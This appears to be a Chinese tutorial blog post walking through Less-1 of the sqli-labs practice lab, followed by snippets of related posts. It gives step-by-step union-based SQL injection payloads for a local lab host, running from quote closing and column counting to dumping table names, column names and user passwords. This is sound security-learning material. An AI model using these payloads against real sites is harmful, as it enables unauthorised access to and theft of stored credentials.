less 函数_sqli-labs注入超详细版(less-1)

最新推荐文章于 2024-05-03 16:47:55 发布
最新推荐文章于 2024-05-03 16:47:55 发布
阅读量155 收藏
点赞数
文章标签: less 函数

7f58aeb80dbba223e11a359a1737683d.png

sql注入是一个很重要安全漏洞,之前学的总是摸棱两可,后来再渗透过程中,经常遇到需要手工注入的情况,这次就从头到尾再做一次,结合mysql数据库一起讲解,希望能给大家带来帮助,顺便自己再一次学习。

less-1 是字符注入,提示我们提交一个id试试

fc3f90729ab2e3c58e332ba4ac04447f.png

在url中加入?id=1 正常显示出id为1的账号信息。

8519c71315474e402a6c7ec29dcee58c.png

此时数据库查询语句大概是这样id是字符型(这是我本地新建的模拟数据,不是sqli-labs里面的库)

f704a8763e065ea0cae7f6084230c797.png

此时我们加入单引号看看

30fd2e4a01185cb8a21bcba3e6547fd5.png

那这里数据库查询语句肯定会报错,如下图

9beb3bc980b9490a49dca055280c364b.png

由此我们判别,id是字符型,且未过滤,转义,那么我们就在这进行注入,sql注入首先要让前面的查询闭合,后面的多余语句注释

c2614167ce9e44284cf237aaf3519fc0.png

如上图所示前面的用单引号闭合,后面的 -- 与 单引号 连接在一起,不能形成正确的sql语句,而 --空格 则可以, 所以在浏览器的url中用 --+ 或 %23 使服务端能够正确注释sql语句
所以payload1 就是 1'--+ payload2就是 1'%23

接下来我们就要用mysql的默认一些库表来爆库,表,那么我们就需要能查询出来,可以用级联查询,union select,用级联查询就需要知道有前面那个表有几列,可以用order by

paylaod: 1' order by 1 --+

a3a5187d9461df0a35c3cac2befa9c5e.png

当我们用满足的列,查询页面数据就可以显示出来,如果我们用一个大一点的,就会如下图所示

9ad9fd71c9a2f4599554a7e9d9e9961a.png

当我们 order by 3的时候 我们页面能正常显示,说明是3个字段,此时我们级联查询

后台结果:

e8961fc55fd9ed57c5fb5a824c497bf9.png

前台页面:

546b16a4323832c57c430ba74e9195e8.png

有小伙伴问了, 123 怎么不显示,实际上程序是只显示第一行结果。所以第二行就不显是,我们只需要把前面的id设置成一个数据库不存在的id,那么就可以显示 1,2,3的结果,这个操作叫做判断回显位

paylaod:-1' UNION select 1,2,3 --+

d365d23ff60c3b808d201a73b3ecb841.png

38a7c4725fcd629da6d138615cd4cb1f.png

爆库名用mysql 自带的函数 database(),我们替换到对应的回显位

SELECT * FROM user where id='-1' UNION select 1,database(),3 -- ' LIMIT 0,1

143a5f89a7739ec071e8414b7c9dd816.png

然后再报表名

http://172.16.225.128/Less-1/?id=-1' union select 1,version(),GROUP_CONCAT(table_name) from information_schema.`TABLES` where table_schema ='security';--+

402d1a769f68c1131391ebe5a06829be.png

information_schema.tables是记录数据库中所有的表,字段,等等,不了解的可以去看下这里面的结构,GROUP_CONCAT 是把结果连成一个字符串再一行显示。

爆字段 GROUP_CONCAT(column_name) from information_schema.columns where table_name ='users' and table_schema='security'

b9e31d23c98bed8c79cae8f9831a520d.png

这里报错来字段和表就可以直接查了

http://172.16.225.128/Less-1/?id=-1' union select 1,username,password from users limit 3,4;--+

53b59937226f3cab14d21d082a176cbb.png

指定limit 后面的起始行数就都可以爆出来了。写的太详细,真的好累,脖子疼。。

谢谢观看

weixin_39710251
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2240
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
concat mysql sql注入_MySQL注入总结
weixin_32572129的博客
01-12 675
01 MySQL数据库结构及常用函数一、MySQL数据库结构MySQL数据库采用库=>表=>列=>数据的存储结构,这样的存储结构影响着我们后续的注入过程。1. MySQL内置库在MySQL(本>=5.7)中除了用户自建的如admin等数据库,还有一些MySQL自带的数据库,这些数据库中存储着MySQL的关键信息:库名功能mysql保存有账户信息、权限信息、存储过程等sys...
sqli-labs靶场 SQL注入学习 Less-1
p4nic的博客
09-10 302
GET - Error based - Single quotes - String GET类型-基于报错的注入 类似于http://localhost/sqli-labs/Less-1/?id=1的URL,通过查询字符串(/?id=1)中传递参数 开发人员直接将GET获取到的参数直接与SQL语句拼接,使得待执行的SQL语句可控,即可以构造非法的SQL语句,造成了SQL注入漏洞 在注入之前,先了解一下MySQL数据库中的元数据 information_schema下的表格 informatio.
sqli-labs—————Less-1(字符型注入
Fly_鹏程万里
05-08 1910
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
SQL注入less-1
最新发布
m0_62903168的博客
05-03 907
注:phpstudy默认的php本为7.x,想要成功的搭建靶场,需要把php本改为5.x。
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 575
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 947
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
03-17
靶场的搭建过程相对简单,只需将下载的“sqli-labs-master.zip”文件解压,按照官方文档或者网络上的教程进行配置,就可以在个人虚拟环境中运行。这一步对于理解Web应用的运行环境和服务器配置也是很有帮助的。 在...
concat mysql sql注入_Mysql数据库使用concat函数执行SQL注入查询
weixin_33304597的博客
12-29 124
SQL注入语句有时候会使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来。例如:原本查询语句是复制代码 代码如下:select username,email,content from test_table where user_id=uid;其中uid,是用户输入的。正常显示结果会出现用户名,用户邮箱,用户留言内容。但是如...
[20][03][39] MySQL 注入的 concat/concat_ws/group_concat 函数详解
安全新司机
08-26 332
[TOC] 本文中使用的例子均在下面的数据库表 t_subject 下执行 1. concat() 函数 1.1 功能 将多个字符串连接成一个字符串 1.2 语法 concat(str1, str2, ...) 返回结果为连接参数产生的字符串,如果有任何一个参数为 null,则返回值为 null 1.3 举例 例 1 select concat (id, name, score) as info from t_subject; 中间有一行为 null 是因为 t_subject 表中有一行的 s
Mysql concat函数与SQL注入
孔子说
12-16 5564
     SQL注入语句有时候会使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来。      例如:原本查询语句是 select username,email,content from test_table where user_id=uid;其中uid,是用户输入的。正常显示结果会出现用户名,用户邮箱,用户留言
mysql 5注入中group_concat的使用
weixin_34293902的博客
03-02 431
mysql中的information_schema 结构用来存储数据库系统信息 information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。  | SCHEMATA ――>存储数据库名的, |——>关键字段:SCHEMA_NAME,表示数据库名称 | TABLES ――>存储表名的 ...
less-1 字符型注入
weixin_52348955的博客
10-30 3173
url编码:空格为20%,'为27%,#为23% 字符型注入的原理和判断方法在最下面的附录里: 第一步: ?id=999999999' union select 1,2,database()# id设置为很大的原因:如果设置id为1,那么mysql确实查出了两条结果(即id=1查询到的结果和database查询到的结果),但是PHP代码决定了该页面只显示一行记录,所有让id等于一个很大的值或者-1,使得id查询不到结果,就只会显示第二条查询语句的结果 database()前面加了1,2,的原因请看附录 h
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1142
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
sqli-labs————less 23(高级注入篇)
Fly_鹏程万里
05-12 2061
前言从这一关开始,我们进进入了短暂的高级注入部分,这一部分中将会陆续介绍一些更为巧妙的注入技巧。Less -23查看一下源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html...
SQL注入实战:sqli-labs实验详解
在题目“less-1”中,通过将?id=1更改为?id=1'and1=1---,观察是否能触发错误或改变输出,来判断是否存在注入。当1=1变为1=2时,如果没有返回任何信息,这通常表明存在注入的可能性。接着,通过测试发现单引号(')是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值